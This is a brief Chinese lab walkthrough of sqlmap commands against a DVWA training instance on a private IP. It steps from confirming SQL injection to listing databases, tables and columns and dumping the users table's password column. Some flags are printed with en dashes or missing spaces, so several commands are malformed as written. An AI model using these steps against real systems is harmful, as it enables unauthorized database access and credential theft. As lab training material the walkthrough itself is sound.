1、通過sqlmap進行注入***:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'
2、通過sqlmap獲取數據庫名:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'--dbs -v 0
3、通過sqlmap獲取表名;
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa –tables
4、通過sqlmap獲取列名:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140' -D dvwa --tables -T users –columns
5、通過sqlmap導出password列的內容:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa --tables -T users --columns –dump